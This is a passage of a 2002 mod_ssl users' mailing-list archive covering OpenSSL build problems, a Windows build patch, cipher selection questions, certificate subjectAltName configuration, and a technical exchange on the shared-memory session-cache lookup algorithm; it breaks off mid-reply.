	for ; Wed, 9 Oct 2002 09:46:42 -0700 (PDT)
Received: from roses.bna.boeing.com (thorny [141.102.34.157])
	by slopok.roses.bna.boeing.com (8.10.1/8.10.1) with ESMTP id g99GkfR17149
	for ; Wed, 9 Oct 2002 09:46:41 -0700 (PDT)
Message-ID: <3DA45D71.78A30EB9@roses.bna.boeing.com>
Date: Wed, 09 Oct 2002 09:46:41 -0700
From: Carlos Ramirez 
Organization: Boeing - Space & Communications
X-Mailer: Mozilla 4.73 [en] (X11; U; SunOS 5.8 sun4u)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Openssl/modssl on automounted partition?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Carlos Ramirez 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Is OpenSSL required to be installed locally to work with mod_ssl as
opposed to building Apache/mod_ssl from a NFS mounted install of
openssl? My experiences are indicating that YES openssl should be
installed on a local filesystem? Is this correct?

I just built Apache/mod_ssl-2.8.11-1.3.27/openssl-0.9.6g on
UNIX/Solaris8 using an installation of openssl on a NFS mounted
partition and I am getting this pop-up message when I try to access the
server via https:
"SSL has recieved an error from the server indicating an incorrect
Message Authentication Code.
This could indicate a network error, a bad server implementation, or a
security violation."

apache/error_log:
[Wed Oct  9 09:31:12 2002] [error] mod_ssl: SSL handshake failed (server
myserver.com:443, client 141.102.34.157) (OpenSSL library error follows)
[Wed Oct  9 09:31:12 2002] [error] OpenSSL: error:1408F455:SSL
routines:SSL3_GET_RECORD:decryption failed or bad record mac

All my other Apache/modssl/openssl servers are working fine, although
they are built using a local install of openssl. 

If this is true. maybe it should be added to the FAQs or the INSTALL
file?

Thanks,

-Carlos
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  9 20:35:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA00278; Wed, 9 Oct 2002 20:34:56 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA00260; Wed, 9 Oct 2002 20:34:04 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 2FF934CE744; Wed,  9 Oct 2002 20:34:07 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 9B77F2882B; Wed,  9 Oct 2002 20:31:22 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mx01-a.netapp.com id RAA25098; Wed, 9 Oct 2002 17:57:00 +0200 (MET DST)
Received: from frejya.corp.netapp.com (frejya [10.10.20.91])
	by mx01-a.netapp.com (8.12.3/8.12.3/NTAP-1.4) with ESMTP id g99Fusl7013601
	for ; Wed, 9 Oct 2002 08:56:54 -0700 (PDT)
Received: from hiphop.atl.netapp.com ([192.168.239.2])
	by frejya.corp.netapp.com (8.12.5/8.12.2/NTAP-1.4) with ESMTP id g99FurGe013571
	for ; Wed, 9 Oct 2002 08:56:53 -0700 (PDT)
Received: (from rtsai@localhost)
	by hiphop.atl.netapp.com (8.11.6/8.11.6) id g99FuZa24734
	for modssl-users@modssl.org; Wed, 9 Oct 2002 11:56:35 -0400
Date: Wed, 9 Oct 2002 11:56:35 -0400
From: Robert Tsai 
To: modssl-users@modssl.org
Subject: Re: ApacheCore.dsp patch for Apache-1.3.26 + mod_ssl-2.8.10-1.3.26
Message-ID: <20021009155635.GM19170@netapp.com>
References: <20021009153804.GL19170@netapp.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20021009153804.GL19170@netapp.com>
User-Agent: Mutt/1.4i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Tsai 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, Oct 09, 2002 at 11:38:04AM -0400, Robert Tsai wrote:
> The mod_ssl diffs don't allow a VC++ build out of the box; being a
> non-Windows user forced to build for VC++, I beat my head for about a

Sorry, I forgot to also include a similar patch for src/ap/ap.dsp:

==== //depot/prod/champagne/main/src/apache_1.3.26/src/ap/ap.dsp#2 - /u/rtsai/p4
/champagne/src/apache_1.3.26/src/ap/ap.dsp ====
44c44
< # ADD CPP /nologo /MD /W3 /O2 /I "..\include" /I "..\os\win32" /D "WIN32" /D "
NDEBUG" /D "_WINDOWS" /Fd"LibR\ap" /FD /c
---
> # ADD CPP /nologo /MD /W3 /O2 /I "..\include" /I "..\os\win32" /D "NDEBUG" /D 
"WIN32" /D "_WINDOWS" /D "EAPI" /Fd"LibR\ap" /FD /c
67c67
< # ADD CPP /nologo /MDd /W3 /GX /Zi /Od /I "..\include" /I "..\os\win32" /D "WI
N32" /D "_DEBUG" /D "_WINDOWS" /Fd"LibD\ap" /FD /c
---
> # ADD CPP /nologo /MDd /W3 /GX /Zi /Od /I "..\include" /I "..\os\win32" /D "_D
EBUG" /D "WIN32" /D "_WINDOWS" /D "EAPI" /Fd"LibD\ap" /FD /c

--
Robert Tsai   rtsai@netapp.com   http://www.netapp.com/   404-228-9983
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  9 20:36:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA00292; Wed, 9 Oct 2002 20:35:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA00258; Wed, 9 Oct 2002 20:34:04 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 21D2B4CE73A; Wed,  9 Oct 2002 20:34:07 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 2874D28706; Wed,  9 Oct 2002 20:31:15 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mx01-a.netapp.com id RAA24510; Wed, 9 Oct 2002 17:38:45 +0200 (MET DST)
Received: from frejya.corp.netapp.com (frejya [10.10.20.91])
	by mx01-a.netapp.com (8.12.3/8.12.3/NTAP-1.4) with ESMTP id g99FcZl7012282
	for ; Wed, 9 Oct 2002 08:38:39 -0700 (PDT)
Received: from hiphop.atl.netapp.com ([192.168.239.2])
	by frejya.corp.netapp.com (8.12.5/8.12.2/NTAP-1.4) with ESMTP id g99FcNGe011181
	for ; Wed, 9 Oct 2002 08:38:34 -0700 (PDT)
Received: (from rtsai@localhost)
	by hiphop.atl.netapp.com (8.11.6/8.11.6) id g99Fc4I24637
	for modssl-users@modssl.org; Wed, 9 Oct 2002 11:38:04 -0400
Date: Wed, 9 Oct 2002 11:38:04 -0400
From: Robert Tsai 
To: modssl-users@modssl.org
Subject: ApacheCore.dsp patch for Apache-1.3.26 + mod_ssl-2.8.10-1.3.26
Message-ID: <20021009153804.GL19170@netapp.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Tsai 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

The mod_ssl diffs don't allow a VC++ build out of the box; being a
non-Windows user forced to build for VC++, I beat my head for about a
day trying to figure out what went wrong. I didn't see anything about
this at http://marc.theaimsgroup.com/?l=apache-modssl so I thought I'd
contribute a patch for ApacheCore.dsp.

All the patch does is add the following preprocessor symbol to the
compile line:

	/D "EAPI"

This is already handily covered by the Win32 command-line builds and
the UNIX builds, but not by the VC++ build.

I don't know how to make this a clean diff; I don't think the
SECURITY_HOLE_PASS_AUTHORIZATION symbol is the default.

==== //depot/prod/champagne/main/src/apache_1.3.26/src/ApacheCore.dsp#4 - /u/rtsai/p4/champagne/src/apache_1.3.26/src/ApacheCore.dsp ====
--- /tmp/tmp.1831.0     Wed Oct  9 11:35:54 2002
+++ /u/rtsai/p4/champagne/src/apache_1.3.26/src/ApacheCore.dsp  Wed Oct  9 11:04:09 2002
@@ -43,7 +43,7 @@
 # PROP Ignore_Export_Lib 0
 # PROP Target_Dir ""
 # ADD BASE CPP /nologo /MD /W3 /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /FD /c
-# ADD CPP /nologo /MD /W3 /O2 /I ".\include" /I ".\os\win32" /I ".\os\win32\win9xconhook" /D "NDEBUG" /D "WIN32" /D "_WINDOWS" /D "WIN32_LEAN_AND_MEAN" /D "SECURITY_HOLE_PASS_AUTHORIZATION" /Fd"CoreR\ApacheCore" /FD /c
+# ADD CPP /nologo /MD /W3 /O2 /I ".\include" /I ".\os\win32" /I ".\os\win32\win9xconhook" /D "NDEBUG" /D "WIN32" /D "_WINDOWS" /D "WIN32_LEAN_AND_MEAN" /D "SECURITY_HOLE_PASS_AUTHORIZATION" /D "EAPI" /Fd"CoreR\ApacheCore" /FD /c
 # ADD BASE MTL /nologo /D "NDEBUG" /win32
 # ADD MTL /nologo /D "NDEBUG" /mktyplib203 /win32
 # ADD BASE RSC /l 0x809 /d "NDEBUG"
@@ -69,7 +69,7 @@
 # PROP Ignore_Export_Lib 0
 # PROP Target_Dir ""
 # ADD BASE CPP /nologo /MDd /W3 /GX /Zi /Od /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /FD /c
-# ADD CPP /nologo /MDd /W3 /GX /Zi /Od /I ".\include" /I ".\os\win32" /I ".\os\win32\win9xconhook" /D "_DEBUG" /D "WIN32" /D "_WINDOWS" /D "WIN32_LEAN_AND_MEAN" /D "SECURITY_HOLE_PASS_AUTHORIZATION" /Fd"CoreD\ApacheCore" /FD /c
+# ADD CPP /nologo /MDd /W3 /GX /Zi /Od /I ".\include" /I ".\os\win32" /I ".\os\win32\win9xconhook" /D "_DEBUG" /D "WIN32" /D "_WINDOWS" /D "WIN32_LEAN_AND_MEAN" /D "SECURITY_HOLE_PASS_AUTHORIZATION" /D "EAPI" /Fd"CoreD\ApacheCore" /FD /c
 # ADD BASE MTL /nologo /D "_DEBUG" /win32
 # ADD MTL /nologo /D "_DEBUG" /mktyplib203 /win32
 # ADD BASE RSC /l 0x809 /d "_DEBUG"

--
Robert Tsai   rtsai@netapp.com   http://www.netapp.com/   404-228-9983
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 10 00:17:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA06956; Thu, 10 Oct 2002 00:16:46 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mx0.gmx.net id AAA06832; Thu, 10 Oct 2002 00:15:36 +0200 (MET DST)
Received: (qmail 2694 invoked by uid 0); 9 Oct 2002 22:15:30 -0000
Date: Thu, 10 Oct 2002 00:15:30 +0200 (MEST)
From: Josef Kandlhofer 
To: modssl-users@modssl.org
MIME-Version: 1.0
Subject: triple des
X-Priority: 3 (Normal)
X-Authenticated-Sender: #0000557956@gmx.net
X-Authenticated-IP: [80.110.59.212]
Message-ID: <20091.1034201730@www56.gmx.net>
X-Mailer: WWW-Mail 1.5 (Global Message Exchange)
X-Flags: 0001
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Josef Kandlhofer 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

i want to use ssl with triple DES encryption. 
Is this possible? Which certificate i need?

With openssl ciphers -v  'RSA:!EXP:!NULL:+HIGH:+MEDIUM:-LOW' i created my
cipher-spec string. 

But apache always uses rc4 encryption....

What i have to do to use triple des??

Thank you!
Josef

ps: i use suse 8.0, apache 1.3, mod_ssl, openssl...

-- 
+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
NEU: Mit GMX ins Internet. Rund um die Uhr für 1 ct/ Min. surfen!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 10 00:56:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA08024; Thu, 10 Oct 2002 00:55:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fermat.math.technion.ac.il id AAA08010; Thu, 10 Oct 2002 00:54:23 +0200 (MET DST)
Received: from fermat.math.technion.ac.il (localhost [127.0.0.1])
	by fermat.math.technion.ac.il (8.12.1/8.12.1) with ESMTP id g99MsLiX029498;
	Thu, 10 Oct 2002 00:54:22 +0200 (IST)
Received: (from nyh@localhost)
	by fermat.math.technion.ac.il (8.12.1/8.12.1/Submit) id g99MsLlK029497;
	Thu, 10 Oct 2002 00:54:21 +0200 (IST)
Date: Thu, 10 Oct 2002 00:54:21 +0200
From: "Nadav Har'El" 
To: modssl-users@modssl.org
Subject: Question about session-cache algorithms
Message-ID: <20021009225421.GA28299@fermat.math.technion.ac.il>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4i
Hebrew-Date: 4 Heshvan 5763
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nadav Har'El" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi. I've been looking at the algorithms modssl uses for managing the SSL
session cache in shared memory, and specifically at the newer "cyclic
buffer" algorithm.

I have an question/idea/rambling about it, it's going to be a little long,
sorry ;)

I believe the cyclic-buffer design is very good, especially its natural
handling of expiration and overflow of the cache before sessions expire.
The time-complexity of additions of new sessions to the cache, as well as
that of expiring old ones or making more room when needed, is O(1) (where N
is the number of sessions in the cache), and these operations always succeed.

However, it appears to me that the session-cache lookup is *not* O(1),
and I've been wondering if this is considered acceptable, e.g., because
other Apache and hardware constraints limit the server's scalability anyway?

As I mention below, the current lookup algorithm is indeed very good for
all "normal" session-cache sizes, so my question is more theoretical, about
how well it will scale as very-high-end servers get better specialized
hardware, have more memory, and expect to handle higher loads.

If I understand correctly, the lookup works by searching the index of a whole
"division" (when a cache is full, 1/256 of the N entries or more, usually
around sqrt(N) entries), one by one, until a match for the second byte is
found (at which point the whole session id is compared).
For N < 65000 or so, this means (again, if I understand correctly) a lookup
length of around sqrt(N)/2. For larger N, the lookup length is worse, around
N/256/2, with the search becoming even slower because the second-byte
comparisons start yielding more false positives at this point.

As always, O(sqrt(N)) or O(N) complexities become worse as N increases.
When N=65536, and the cache is full, the average number of comparisons for
a session-id lookup is (if I'm calculating correctly) 128. When N=131072,
the average number of comparisons for a lookup grows to 256, and the fact
that only 2 bytes are used for the quick comparison will start taking its
additional toll.

To put the numbers in perspective (and to show that the example Ns above
are untypically large), a session cache of size 500Kbytes is typically
used in Apache, making room for only about N=3000 session-cache entries.
In this case, the typical number of one-byte comparisons a lookup needs is
roughly 32 (if I'm calculating this correctly). This is certainly not
bad, and should give excellent results for this algorithm (as indeed I
see people are reporting).

While N=3000 is typical, N=65536 is probably not because it results in a
very big cache, about 10MB. N=131072, 20MB, is probably considered
ridiculously large. Is this why such N's were considered uninteresting
and this lookup algorithm was deemed good enough in all practical cases?

If anyone is wondering why I'm thinking about this issue, and why someone
may want more than the 500Kbyte session-cache (N=3000 sessions), think about
the following calculation:

let's say that from a bit of research you find that most browsers will reuse
a session within two minutes of its first creation. If you want the session
cache to hold each new session for two minutes (120 seconds), you would want
to hope that you will not get more than 25 (=3000/120) new sessions (i.e.,
new users) per second.
For most moderately-loaded servers with ordinary hardware, this assumption
is good - the CPU might not even be able to handle much more than 25 RSA
operations per second, and 25 new sessions a second translates to 2 million
SSL sessions a day - a very busy server indeed.
But what about a very-high-end server with an "SSL acceleration" card (a
card that, among other things, does RSA operations in hardware)? Such cards
are typically rated for doing 1,000, or even much more, RSA operations per
second, meaning that the server can theoretically now easily handle, for
example, 500 new sessions per second (I'm saying theoretically, because in
real life Apache might not be able to handle such a load because of limits
on the number of processes, memory, and so on).
500 new sessions per second, each we hope to keep for 120 seconds, dictates
60,000 entries in the session cache. For example.

Anyway, if such huge session caches will ever be of interest, perhaps the
lookup algorithm should be replaced by something else, perhaps an additional
simple hash table using the session-id as key (no need for hash function other
than a modulo)?
I'm not talking about a complicated generic hash table like the "ht" session
cache - I'm talking about a simple array of indices pointing into positions of
the cyclic buffer, and each entry in that buffer will also hold "next"
indices for keeping the bucket's chain. If we assume that no "subcache"
will hold more than 65536 entries, we can use 2-byte indices for all those
"pointers", and such hash-table's overhead will be as low as 4-6 bytes
per session in the cache. A slight computational overhead will also be
incurred for updating the hash-table structure on changes to the cyclic
buffer.
I've implemented such a data structure once (for holding a cache of recently
seen packet numbers to avoid acting on a retransmitted packet twice), and it
seemed to work quite well.

I'm guessing that because the current lookup algorithm is quite good
for all typical session-cache size, it might not make too much sense
modifying the algorithm now. but perhaps it's worth thinking about for the
future.

What do you think?


-- 
Nadav Har'El                        |    Wednesday, Oct 9 2002, 4 Heshvan 5763
nyh@math.technion.ac.il             |-----------------------------------------
Phone: +972-53-245868, ICQ 13349191 |Disclaimer: The opinions expressed above
http://nadav.harel.org.il           |are not my own.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 10 15:50:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA00433; Thu, 10 Oct 2002 15:49:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id PAA00417; Thu, 10 Oct 2002 15:48:25 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id D6B774CE74D; Thu, 10 Oct 2002 15:48:28 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id D25812882C; Thu, 10 Oct 2002 15:29:01 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.be.ubizen.com id NAA26222; Thu, 10 Oct 2002 13:06:12 +0200 (MET DST)
Received: (from local) by mail.be.ubizen.com id PAA05722 for ; Thu, 10 Oct 2002 15:12:17 +0200
Received: from internal
 via SMTP by batty.netvision.be, id smtpda05718; Thu Oct 10 13:12:13 2002
Received: (qmail 8307 invoked from network); 10 Oct 2002 11:05:57 -0000
Received: from unknown (HELO ubi) (10.0.0.10)
  by amaya.be.ubizen.com with SMTP; 10 Oct 2002 11:05:56 -0000
Received: from ubizen.com (carlito.be.ubizen.com [10.0.40.56])
 by ubi.be.ubizen.com (#####) with ESMTP id <0H3R002S2ITWZ9@ubi.be.ubizen.com>
 for modssl-users@modssl.org; Thu, 10 Oct 2002 13:05:56 +0200 (MET DST)
Date: Thu, 10 Oct 2002 13:08:01 +0200
From: "Carl D'Halluin" 
Subject: SSLCipherSuite order is not respected
To: modssl-users@modssl.org
Message-id: <3DA55F91.81491FDB@ubizen.com>
MIME-version: 1.0
X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U)
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
X-Accept-Language: en
X-Sanitizer: Out
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Carl D'Halluin" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello all,

I quote the mod_ssl documentation present at
http://www.modssl.org/docs/2.8/ssl_reference.html#ToC9

"An SSL cipher can also be an export cipher and is either a SSLv2 or SSLv3/TLSv1 cipher (here TLSv1 is equivalent to SSLv3). To specify which ciphers to use, one can either specify all the Ciphers,
one at a time, or use aliases to specify the preference and order for the ciphers (see Table 1). "

There it says "use aliases to specify the preference and order for the ciphers".
I wonder what is meant by this.

My problem emerged with a Netscape browser which can speak both weak and strong ciphers. In the SSL handshake it presents all these ciphers. Next, the apache server takes his set of supported ciphers,
and makes the intersection between his set and the set of the client.

Now one could expect that the server takes the cipher from this intersection, which is the first in its SSLCipherSuite settings, or maybe that the server takes the strongest common cipher. However
this is not true: the server just takes the first supported cipher requested by the client.

The funny thing is that most clients first present their weak ciphers, and next their strong ciphers. This makes that all strong browsers speaking with most ssl servers, will always speak a very weak
cipher.

I think mod_ssl or openssl should be tuned to use their SSLCipherSuite config to choose the cipher, instead of using the client config.

I found a reference on this in a thread from 1998
http://marc.theaimsgroup.com/?l=apache-ssl&m=91231283120300&w=2

Apparently this is not considered a problem, although I consider this a change request for mod_ssl and/or openssl.

Kind regards,

-- 
__________________________________________________

Carl D'Halluin - Product Manager DMZ/Shield
We secure e-business.

http://www.ubizen.com
tel +32 (0)16 28 70 00 - fax +32 (0)16 28 71 00
Ubizen - Ubicenter  - Philipssite 5 - B-3001 Leuven - Belgium
__________________________________________________
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 10 16:22:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA01963; Thu, 10 Oct 2002 16:21:47 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from imo-r03.mx.aol.com id QAA01932; Thu, 10 Oct 2002 16:20:27 +0200 (MET DST)
From: camccuk@netscape.net
Received: from camccuk@netscape.net
	by imo-r03.mx.aol.com (mail_out_v34.13.) id m.ec.5c31104 (22680)
	 for ; Thu, 10 Oct 2002 10:20:03 -0400 (EDT)
Received: from  netscape.net (mow-m19.webmail.aol.com [64.12.180.135]) by air-in04.mx.aol.com (v89.10) with ESMTP id MAILININ41-1010102003; Thu, 10 Oct 2002 10:20:03 -0400
Date: Thu, 10 Oct 2002 10:18:48 -0400
To: modssl-users@modssl.org
Subject: Using subjectAltName
MIME-Version: 1.0
Message-ID: <74D066C2.5DAD7684.001D8163@netscape.net>
X-Mailer: Atlas Mailer 2.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: camccuk@netscape.net
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello all,

Sadly I've lost the original mail but someone a few weeks ago mentioned the use of the subjectAltName extension to store domain names in a certificate - can anyone clarify how to do this? I've found a few examples of this on the net and dug through the docs but I can't get it to work for me...

I'm currently using a hacked version of the ssl.ca-0.1 scripts and have the following for my config:

[ req ]
default_bits                                    = 1024
default_keyfile                                 = server.key
distinguished_name                              = req_distinguished_name
string_mask                                     = nombstr
req_extensions                                  = v3_req
x509_extensions                                 = usr_cert
[ req_distinguished_name ]
countryName                                     = Country Name (2 letter code)
countryName_default                             = GB
countryName_min                                 = 2
countryName_max                                 = 2
stateOrProvinceName                             = State or Province Name (full name)
localityName                                    = Locality Name (eg, city)
0.organizationName                              = Organization Name (eg, company)
organizationalUnitName                  = Organizational Unit Name (eg, section)
commonName                                      = Common Name (eg, www.domain.com)
commonName_max                                  = 64
emailAddress                                    = Email Address
emailAddress_max                                = 40
[ v3_req ]
nsCertType                                      = server
basicConstraints                                = critical,CA:false
[ user_cert ]
subjectAltName                                  = DNS:our.domain.co.uk

This always results in "Error Loading extension section usr_cert". A couple of quesions: do I need this DNS prefix? Does it matter what I call the extensions section? How do I specify multiple host names? I found an example which led me to use the x509_extensions tag instead of extensions - what is the difference?

I would be hugely grateful for any pointers...

cam
-----------------------------------------
camccuk@netscape.net


__________________________________________________________________
The NEW Netscape 7.0 browser is now available. Upgrade now! http://channels.netscape.com/ns/browsers/download.jsp 

Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 10 19:33:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA08885; Thu, 10 Oct 2002 19:32:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from VL-MS-MR001.sc1.videotron.ca id TAA08878; Thu, 10 Oct 2002 19:31:57 +0200 (MET DST)
Received: from dopey.geoffnet ([24.202.196.188])
 by VL-MS-MR001.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 0.9 (built Jul 29 2002))
 with ESMTP id <0H3S003MT0P94C@VL-MS-MR001.sc1.videotron.ca> for
 modssl-users@modssl.org; Thu, 10 Oct 2002 13:31:58 -0400 (EDT)
Date: Thu, 10 Oct 2002 13:31:47 -0400
From: Geoff Thorpe 
Subject: Re: Question about session-cache algorithms
In-reply-to: <20021009225421.GA28299@fermat.math.technion.ac.il>
To: modssl-users@modssl.org
Cc: "Nadav Har'El" 
Message-id: <200210101331.47889.geoff@geoffthorpe.net>
MIME-version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT
User-Agent: KMail/1.4.3
References: <20021009225421.GA28299@fermat.math.technion.ac.il>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi there,

I suppose as the author of the implementation you're disecting I should 
probably respond in some way :-)

I'm in agreement with most of your comments and appreciate you having 
taken a look and provided some analysis. I'll respond to a couple of 
specific points but will mostly make some general comments afterwards 
that I think will address most points anyway.

> However, it appears to me that the session-cache lookup is *not*
> O(1), and I've been wondering if this is considered acceptable, e.g.,
> because other Apache and hardware constraints limit the server's
> scalability anyway?

If you check the "shmht" implementation (which is what "shmcb" was 
created to replace) you'll see that a linear search was being conducted 
on the *entire* cache, and for each lookup an ASN1 decode was being 
performed. This ASN1 decode operation being repeated across hundreds of 
sessions is a huge order of magnitude more computationally expensive 
than the lookup in shmcb and was actually large enough to significantly 
drag down the server's SSL/TLS processing capacity/sec. When a cache 
lookup starts to compare to the overhead of an RSA/DSA private key 
operation, you've got serious trouble. I'm quietly confident that you 
could add a "for(loop=0;loop<1000;loop++){}" loop around the cache 
lookup function in shmcb and you'd still not notice the slightest 
difference in the SSL/TLS performance of apache. So the objective 
wasn't really to create a caching system with the lowest-possible order 
of complexity, it was to create a caching system in which the cache 
operations were utterly insignificant compared to SSL/TLS PKC crypto 
operations, as they should always have been considering the HTTPS 
scenario. If you understand SSL/TLS, and in particular the RSA/DSA 
intricacies, you'll know that it is utterly unforgivable that something 
as simple as a key-value cache should introduce overheads that show up 
in the profiling compared to 1024-bit RSA private key operations and 
other SSL/TLS processing.

Anyway, more about scalability later.

> As I mention below, the current lookup algorithm is indeed very good
> for all "normal" session-cache sizes, so my question is more
> theoretical, about how well it will scale as very-high-end servers
> get better specialized hardware, have more memory, and expect to
> handle higher loads.

This is where I think my general comments will address your concerns.

> If I understand correctly, the lookup works by searching the index of
> a whole "division" (when a cache is full, 1/256 of the N entries or
> more, usually around sqrt(N) entries), one by one, until a match for
> the second byte is found (at which point the whole session id is
> compared).
> For N < 65000 or so, this means (again, if I understand correctly) a
> lookup length of around sqrt(N)/2. For larger N, the lookup length is
> worse, around N/256/2, with the search becoming even slower because
> the second-byte comparisons start yielding more false positives at
> this point.

Actually, as the cache is partitioned into subcaches - proportional to 
sqrt(N) of them (though generally fewer of them than sqrt(N)) - your 
lookups drill into the correct subcache in a single comparison of order 
O(1) (you mask the first byte of the session_id). So, you've got a 
subcache of order O(sqrt(N)) to "search" rather than N (I think you 
muddled this up in your analysis). The second-byte tests in the 
subcache iteration are so considerably faster than an ASN1 decode 
function call that we can generally ignore them for complexity 
arguments. So you will likely ASN1 decode (sqrt(N)/256)/2 sessions (ie. 
sqrt(N)/512 of them) during a lookup in a full (sub)cache. This is less 
than the N/512 you suggested because you forgot the subcaching, so I 
think that throws out some of your estimates, though OTOH your 
estimates serve as a 1/256th estimate on shmht performance. :-)

Anyway, you need a large N and a full cache for those subcache lookups 
to expect *any* false-positives on average, but you can certainly 
expect far fewer than you'd get on a linear search over the entire 
cache without optimisations like the second-byte test. As for lowering 
the number of false-positives in the lookup as you seem to be 
suggesting - that's not that hard; rather than taking the second byte 
as an optimisation, we could take the fifth, sixth, seventh and eighth 
bytes (ie. the second word) and memcpy() them into a "second word" 
index that could be tested in lookups. This would reduce the proportion 
of false positives from 1/256 to (1/256)^4 which is 1/4294967296. In 
other words, you'd get a false positive once every few years if you're 
unlucky. However, again - the cache overheads in shmcb are already low 
enough that processing in the SSL/TLS stack (even if *all* crypto is 
offloaded to a impossibly zero-overhead zero-latency hardware driver) 
will always dominate your profile, so eeking a few cycles of 
optimisation out of the cache logic (and introducing bug-prone 
complexities in to the code) is probably not worth the effort.

> As always, O(sqrt(N)) or O(N) complexities become worse as N
> increases. When N=65536, and the cache is full, the average number of
> comparisons for a session-id lookup is (if I'm calculating correctly)
> 128. When N=131072, the average number of comparisons for a lookup
> grows to 256, and the fact that only 2 bytes are used for the quick
